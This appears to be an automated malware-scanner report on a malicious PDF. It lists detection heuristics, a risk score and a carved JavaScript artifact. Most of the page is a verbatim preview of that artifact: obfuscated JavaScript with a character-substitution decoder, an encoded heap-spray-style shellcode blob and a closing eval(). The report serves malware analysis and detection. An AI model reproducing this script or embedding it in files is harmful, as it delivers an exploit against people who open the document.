MALICIOUS
166
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. A high-severity PDF_EVAL heuristic firing suggests the use of eval(), a common technique for obfuscating malicious JavaScript. The embedded JavaScript is likely designed to download and execute a second-stage payload. The file's authoring application and creation date appear to be obfuscated or randomized.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 4
-
JavaScript action low 2 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTERPDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.Matched line in script
0==0f5R\n0000pWLXUcuWHAw>W6Vb0=0zS9)eC(9o\"%zvQvQ%zvQvQ%zvQvQ%zM7.3%zQQI3%zZZxD%zrM3D%zrMMN%z.7QQ%z.fvQ%z.37H%z.rMI%z77.x%z7777%zr3s7%zY7v.%z.7.7%zZv.7%z.QH7%zD7Zv%zvf7Q%zD7Zv%zZ..s%z.7MQ%z.7.3%zZv.7%z3DMQ%zZNrs%z.NHN%zMsMQ%z.7NN%z.7.7%zHHZZ%z3D.3%zssrs%zZINN%zMs.N%z.7N7%z.7.7%zHHZZ%z3D.s%zxHrs%zNMI7%zMsfY%z.7MY%z.7.7%zHHZZ%z3D.Q%zMMrs%zM7fN%zMsr7%z.7Q3%z.7.7%zHHZZ%z3D77%zf.rs%zMHDZ%zMsIs%z.7fD%z.7.7%zHHZZ%zH773%zYsZ7%zDHfx%zZZNI%z7sHH%z.rMZ%z.7..%z3N.7%zDHZZ%zZvx3%z.3HH%z..rI%zZv3Z%z7s3H%zMs3D% … -
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0007_000.js |
pdf-javascript-stream | PDF /JS object 7 at offset 0x237 | 8083 bytes |
SHA-256: 0eb5b5a2e58853477441cddab122b93b259b21fa557d3165ebfd2586fa443e9e |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 eval/decoder/string-building token(s). 90 of 155 identifiers look randomly generated (e.g. 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmn') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
function ANpgZDl4KCedef(ANpgZDl4KCedef,u996f8Knq6B) {var tBRQrE=ANpgZDl4KCedef. substr (u996f8Knq6B, 1);return tBRQrE;}/*h4o1OGjThQUf5fGS|s8FIjfOSggjOlRw|AovDNEldZGZ5M*/function LtFt5thGWDFJ(FABvmVNVA4z) {/*i5qoEQJSiqzI4aar|XVsaiwCCMJcHVJpR0UVG|opJdxE4Ow1lH*/var AGri6 = new String("<>(){} .,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789");/*CpWEsiNKpjUV1K[MRJ16TUuYO8KGkR]m7Brpk50PfKlWVR*//*maajuvTI9SSF2k|fhwNNWJDmoONAjfkM|AvqvFyvXH1QrmwPZ9dw*/var upRekBB /*hYwvmxV[XiDYTtK]i5wpwDXZzmy*/= new String(" ko5R10q<H3xY.7i{hLtnEaVbB2PTwJymG>C6ec9Fd4WU}8ASl(jX)OzKpgu,MNfQvIZsrD");/*Gk7n9uYmiut6SxVmhf|FayvN|Imrvbg1CeeBP3oyoYu6*/for(YEwif2ihnL21h2vX=0;YEwif2ihnL21h2vX<AGri6.length;YEwif2ihnL21h2vX++) {if(FABvmVNVA4z == ANpgZDl4KCedef(upRekBB, YEwif2ihnL21h2vX)) {/*GjtllyBa[PTs2BdTiUWCyYS]CGWa1Sm72VjeJk5t*/return ANpgZDl4KCedef(AGri6, YEwif2ihnL21h2vX);/*ObsP4BxOX0DvJvyQHO <a0GTLpy]PtEF8gxOaz*/}}return FABvmVNVA4z;}/*pN3t9[fxTmB]D2hXEMLZc5ei*//*AWIbMKHZE0YHVMa8O1C|YZKlkk|fElZE*/var Ux47pImLhp = new String;var b0z6TUbrEbrA7pLlW = new String("\nKCX0XO2nNrfILKQ4Iifr0=0S9p0HXXCuo5;\nKCX0tdK3aiUT(zb>Sh7M;\nFzSeOWlS064wxly{r2tlyCjc2oL>czjEaFiA7vZwY{<0yWwN78DdZgYdSXrt5R\n00p4W890oL>czjEaFiA7vZwY{q89SdO40*0f0 0yWwN78DdZgYdSXrt5R\n0000L>czjEaFiA7vZwY{0+=0L>czjEaFiA7vZwY{;\n001\n00L>czjEaFiA7vZwY{0=0L>czjEaFiA7vZwY{q)z6)OXWSdoM<0yWwN78DdZgYdSXrt0/0f5;\n00X9OzXS0L>czjEaFiA7vZwY{;\n1\nFzSeOWlS0w}.{r6paVx2TdF8)oU7OeffLrumlAVKs(5R\n00KCX0XtsSpv3n7c(phC(d0=0MgMeMeMeMe;\n00KCX0pWLXUcuWHAw>W6Vb0=0zS9)eC(9o\"%zvQvQ%zvQvQ%zvQvQ%zM7.3%zQQI3%zZZxD%zrM3D%zrMMN%z.7QQ%z.fvQ%z.37H%z.rMI%z77.x%z7777%zr3s7%zY7v.%z.7.7%zZv.7%z.QH7%zD7Zv%zvf7Q%zD7Zv%zZ..s%z.7MQ%z.7.3%zZv.7%z3DMQ%zZNrs%z.NHN%zMsMQ%z.7NN%z.7.7%zHHZZ%z3D.3%zssrs%zZINN%zMs.N%z.7N7%z.7.7%zHHZZ%z3D.s%zxHrs%zNMI7%zMsfY%z.7MY%z.7.7%zHHZZ%z3D.Q%zMMrs%zM7fN%zMsr7%z.7Q3%z.7.7%zHHZZ%z3D77%zf.rs%zMHDZ%zMsIs%z.7fD%z.7.7%zHHZZ%zH773%zYsZ7%zDHfx%zZZNI%z7sHH%z.rMZ%z.7..%z3N.7%zDHZZ%zZvx3%z.3HH%z..rI%zZv3Z%z7s3H%zMs3D%z.7Zv%z.7.7%zrs37%z7IYD%zD7xM%zsrMs%z.7.7%zZZ.7%z7QHH%zfHZv%zf7Zx%zZZ37%zx7HH%zNMrs%z.7.7%z37.7%zHHZv%zrI73%z3Z.Y%z3HZv%zMs7s%z.7r.%z.7.7%zHH.x%zfrx7%z3Q.7%zxNDN%zfrrH%z.3H7%zrHDs%z.7.7%zDHNM%zZvx7%z.QHH%z..rI%zZv3Z%z7s3H%zH7Ms%z.7.7%zrI.7%z3s.r%zHH.x%zYxx3%z3xQv%zNM3x%zx7DH%z3x37%zHHZv%zrI7Q%z3Z.H%z3HZv%zMs7s%z.7xx%z.7.7%z.7rI%zDHNM%zZvx7%z.sHH%z.YrI%zZv3Z%z7s3H%z77Ms%z.7.7%zrI.7%zZvNM%z77HH%z..rI%zZv3Z%z7s3H%z.7Ms%z.7.7%zH..7%z3Y3v%zM..x%zM..x%zM..x%zM..x%zMQZx%z3I.3%zZv3x%zMYQI%z3YNr%zM7NM%zZv3H%zZvMQ%z.sDf%z3fZv%z3D.Q%zDxZv%zZvYQ%z7ND3%z.xDs%z3DNx%zDDZv%z.xx7%zYxNx%zHZfZ%zvfH.%zfx.x%zYx3D%z.MND%z77IN%zNYYI%z.sD3%zfNf.%z.x.f%zH7NY%zN.Mv%zNNYv%zDH3N%z3IMH%zMvZv%z3IZv%z.xx3%zrDQf%z.QZv%zZvHv%z7Q3I%zQf.x%z.3Zv%z.xZv%z3NfH%zfY3f%z.7.s%zN3Ms%zNMNN%z3HNM%zHQ3Y%zHMHf%z.7HN%zsvZr%zsMsv%zf7QH%zZvf7%zZYQM%zQNZN%zsQZ.%zZDf.%zZZZ.%zf7Z7%zZxZf%zZsZ7%zZxf7%zZNZ7%zf.Zv%zZrsM%zQ7sM%zZvZD%zQDQY%zMMQr\"5;\n00WF0oU7OeffLrumlAVKs(0==0N5R\n0000XtsSpv3n7c(phC(d0=0MgQMQMQMQM;\n0000pWLXUcuWHAw>W6Vb0=0zS9)eC(9o\"%zvQvQ%zvQvQ%zvQvQ%zM7.3%zQQI3%zZZxD%zrM3D%zrMMN%z.7QQ%z.fvQ%z.37H%z.rMI%z77.x%z7777%zr3s7%zY7v.%z.7.7%zZv.7%z.QH7%zD7Zv%zvf7Q%zD7Zv%zZ..s%z.7MQ%z.7.3%zZv.7%z3DMQ%zZNrs%z.NHN%zMsMQ%z.7NN%z.7.7%zHHZZ%z3D.3%zssrs%zZINN%zMs.N%z.7N7%z.7.7%zHHZZ%z3D.s%zxHrs%zNMI7%zMsfY%z.7MY%z.7.7%zHHZZ%z3D.Q%zMMrs%zM7fN%zMsr7%z.7Q3%z.7.7%zHHZZ%z3D77%zf.rs%zMHDZ%zMsIs%z.7fD%z.7.7%zHHZZ%zH773%zYsZ7%zDHfx%zZZNI%z7sHH%z.rMZ%z.7..%z3N.7%zDHZZ%zZvx3%z.3HH%z..rI%zZv3Z%z7s3H%zMs3D%z.7Zv%z.7.7%zrs37%z7IYD%zD7xM%zsrMs%z.7.7%zZZ.7%z7QHH%zfHZv%zf7Zx%zZZ37%zx7HH%zNMrs%z.7.7%z37.7%zHHZv%zrI73%z3Z.Y%z3HZv%zMs7s%z.7r.%z.7.7%zHH.x%zfrx7%z3Q.7%zxNDN%zfrrH%z.3H7%zrHDs%z.7.7%zDHNM%zZvx7%z.QHH%z..rI%zZv3Z%z7s3H%zH7Ms%z.7.7%zrI.7%z3s.r%zHH.x%zYxx3%z3xQv%zNM3x%zx7DH%z3x37%zHHZv%zrI7Q%z3Z.H%z3HZv%zMs7s%z.7xx%z.7.7%z.7rI%zDHNM%zZvx7%z.sHH%z.YrI%zZv3Z%z7s3H%z77Ms%z.7.7%zrI.7%zZvNM%z77HH%z..rI%zZv3Z%z7s3H%z.7Ms%z.7.7%zH..7%z3Y3v%zM..x%zM..x%zM..x%zM..x%zMQZx%z3I.3%zZv3x%zMYQI%z3YNr%zM7NM%zZv3H%zZvMQ%z.sDf%z3fZv%z3D.Q%zDxZv%zZvYQ%z7ND3%z.xDs%z3DNx%zDDZv%z.xx7%zYxNx%zHZfZ%zvfH.%zfx.x%zYx3D%z.MND%z77IN%zNYYI%z.sD3%zfNf.%z.x.f%zH7NY%zN.Mv%zNNYv%zDH3N%z3IMH%zMvZv%z3IZv%z.xx3%zrDQf%z.QZv%zZvHv%z7Q3I%zQf.x%z.3Zv%z.xZv%z3NfH%zfY3f%z.7.s%zN3Ms%zNMNN%z3HNM%zHQ3Y%zHMHf%z.7HN%zsvZr%zsMsv%zf7QH%zZvf7%zZYQM%zQNZN%zsQZ.%zZDf.%zZZZ.%zf7Z7%zZxZf%zZsZ7%zZxf7%zZNZ7%zf.Zv%zZrsM%zQ7sM%zZvZD%zQDQY%zMMQr\"5;\n001\n0098)90WF0oU7OeffLrumlAVKs(0==0f5R\n0000pWLXUcuWHAw>W6Vb0=0zS9)eC(9o\"%zvQvQ%zvQvQ%zvQvQ%zM7.3%zQQI3%zZZxD%zrM3D%zrMMN%z.7QQ%z.fvQ%z.37H%z.rMI%z77.x%z7777%zr3s7%zY7v.%z.7.7%zZv.7%z.QH7%zD7Zv%zvf7Q%zD7Zv%zZ..s%z.7MQ%z.7.3%zZv.7%z3DMQ%zZNrs%z.NHN%zMsMQ%z.7NN%z.7.7%zHHZZ%z3D.3%zssrs%zZINN%zMs.N%z.7N7%z.7.7%zHHZZ%z3D.s%zxHrs%zNMI7%zMsfY%z.7MY%z.7.7%zHHZZ%z3D.Q%zMMrs%zM7fN%zMsr7%z.7Q3%z.7.7%zHHZZ%z3D77%zf.rs%zMHDZ%zMsIs%z.7fD%z.7.7%zHHZZ%zH773%zYsZ7%zDHfx%zZZNI%z7sHH%z.rMZ%z.7..%z3N.7%zDHZZ%zZvx3%z.3HH%z..rI%zZv3Z%z7s3H%zMs3D%z.7Zv%z.7.7%zrs37%z7IYD%zD7xM%zsrMs%z.7.7%zZZ.7%z7QHH%zfHZv%zf7Zx%zZZ37%zx7HH%zNMrs%z.7.7%z37.7%zHHZv%zrI73%z3Z.Y%z3HZv%zMs7s%z.7r.%z.7.7%zHH.x%zfrx7%z3Q.7%zxNDN%zfrrH%z.3H7%zrHDs%z.7.7%zDHNM%zZvx7%z.QHH%z..rI%zZv3Z%z7s3H%zH7Ms%z.7.7%zrI.7%z3s.r%zHH.x%zYxx3%z3xQv%zNM3x%zx7DH%z3x37%zHHZv%zrI7Q%z3Z.H%z3HZv%zMs7s%z.7xx%z.7.7%z.7rI%zDHNM%zZvx7%z.sHH%z.YrI%zZv3Z%z7s3H%z77Ms%z.7.7%zrI.7%zZvNM%z77HH%z..rI%zZv3Z%z7s3H%z.7Ms%z.7.7%zH..7%z3Y3v%zM..x%zM..x%zM..x%zM..x%zMQZx%z3I.3%zZv3x%zMYQI%z3YNr%zM7NM%zZv3H%zZvMQ%z.sDf%z3fZv%z3D.Q%zDxZv%zZvYQ%z7ND3%z.xDs%z3DNx%zDDZv%z.xx7%zYxNx%zHZfZ%zvfH.%zfx.x%zYx3D%z.MND%z77IN%zNYYI%z.sD3%zfNf.%z.x.f%zH7NY%zN.Mv%zNNYv%zDH3N%z3IMH%zMvZv%z3IZv%z.xx3%zrDQf%z.QZv%zZvHv%z7Q3I%zQf.x%z.3Zv%z.xZv%z3NfH%zfY3f%z.7.s%zN3Ms%zNMNN%z3HNM%zHQ3Y%zHMHf%z.7HN%zsvZr%zsMsv%zf7QH%zZvf7%zZYQM%zQNZN%zsQZ.%zZDf.%zZZZ.%zf7Z7%zZxZf%zZsZ7%zZxf7%zZNZ7%zf.Zv%zZrsM%zQ7sM%zZvZD%zQDQY%zMMQr\"5;\n001\n00KCX0VJY)GbYSQQ}ne>QP0=0MgvMMMMM;\n00KCX0WEtfNL}Hs7}(jM.A0=0pWLXUcuWHAw>W6Vbq89SdO40*0f;\n00KCX0yWwN78DdZgYdSXrt0=0VJY)GbYSQQ}ne>QP0-0oWEtfNL}Hs7}(jM.A0+0MgQr5;\n00KCX0L>czjEaFiA7vZwY{0=0zS9)eC(9o\"%zDMDM%zDMDM\"5;\n00L>czjEaFiA7vZwY{0=064wxly{r2tlyCjc2oL>czjEaFiA7vZwY{<0yWwN78DdZgYdSXrt5;\n00KCX0WP9YXXfzz87mth,e0=0oXtsSpv3n7c(phC(d0-0MgvMMMMM50/0VJY)GbYSQQ}ne>QP;\n00FlX0oKCX0at99cV(}9C>wUSia0=0M;0at99cV(}9C>wUSia0 0WP9YXXfzz87mth,e;0at99cV(}9C>wUSia0++05R\n0000XO2nNrfILKQ4Iifr[at99cV(}9C>wUSia]0=0L>czjEaFiA7vZwY{0+0pWLXUcuWHAw>W6Vb;\n001\n1\nFzSeOWlS0eK6rAef4a{.W>.n.o5R\n00KCX0A,OxVWpQhJmQLlb>0=0M;\n00KCX0.NdycWYf,2UGFZS.0=0C((qKW9p9XJ9X)WlSqOlPOXWSdo5;\n00C((qe89CXTWA9VzOotdK3aiUT(zb>Sh7M5;\n\n00WF0o.NdycWYf,2UGFZS.0 0sqN5R\n0000w}.{r6paVx2TdF8)oM5;\n0000KCX0hdBTbEy4)vU3)M860=0zS9)eC(9o\"%zMeMe%zMeMe\"5;\n0000p4W890ohdBTbEy4)vU3)M86q89SdO40 0vvDIf5hdBTbEy4)vU3)M860+=0hdBTbEy4)vU3)M86;\n0000O4W)0qel88C6POlX90=0xl88C6qel889eO.ACW8hSFloR\n000000)z6U0:0\"\"<0A)d0:0hdBTbEy4)vU3)M86\n00001\n00005;\n001\nWF0o.NdycWYf,2UGFZS.0k=0D5R\n0000OXu0R\nWF0oC((qcleqxl88C6qd9OhelS5R\n00000000w}.{r6paVx2TdF8)of5;\n00000000KCX0t2rlHn(MA>WP9JdU0=0zS9)eC(9o\"%MD\"5;\n00000000p4W890ot2rlHn(MA>WP9JdUq89SdO40 0MgvMMM5t2rlHn(MA>WP9JdU0+=0t2rlHn(MA>WP9JdU;\n00000000t2rlHn(MA>WP9JdU0=0\"aq\"0+0t2rlHn(MA>WP9JdU;\nC((qcleqxl88C6qd9OhelSot2rlHn(MA>WP9JdU5;\n00000000A,OxVWpQhJmQLlb>0=0N;\n0000001\n00000098)90R\n00000000A,OxVWpQhJmQLlb>0=0N;\n0000001\n00001\n0000eCOe40o95R\n000000A,OxVWpQhJmQLlb>0=0N;\n00001\n0000WF0oA,OxVWpQhJmQLlb>0==0N5R\n000000WF0oo.NdycWYf,2UGFZS.0k=0sqN&&0.NdycWYf,2UGFZS.0 0D55R\n00000000w}.{r6paVx2TdF8)oN5;\n00000000KCX0Asx6TULnSQyFxhia0=0\"NfDDDDDDDDDDDDDDDDDD\";\n00000000FlX0o(V3z}NIm>A,.hdgw0=0M;0(V3z}NIm>A,.hdgw0 0fsZ;0(V3z}NIm>A,.hdgw0++05R\n0000000000Asx6TULnSQyFxhia0+=0\"r\";\n000000001\n00000000zOW8q(XWSOFo\"%vIMMMF\"<0Asx6TULnSQyFxhia5;\n0000001\n00001\n001\n1\nC((q3HsiOb64PDE9BcfH0=0eK6rAef4a{.W>.n.;\ntdK3aiUT(zb>Sh7M0=0C((q)9OTWA9VzOo\"C((q3HsiOb64PDE9BcfHo5\"<0NM5;\n");/*hgKsnjxe840KUyYL0fkP{L0QOVU0vZzS59Bj}yDis3sDsHOinyy*//*ApjPA3FwS|EO4Gxe51Couvrc25Bgu|zugY9gSFTlAXz5enZZ*/for(mqcalZ=0;mqcalZ<b0z6TUbrEbrA7pLlW.length;mqcalZ++)Ux47pImLhp += LtFt5thGWDFJ(ANpgZDl4KCedef(b0z6TUbrEbrA7pLlW,mqcalZ));eval(Ux47pImLhp);/*cDPNusGqumbl[LH0LoIR7tSVj]zNnPsFS7*/
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.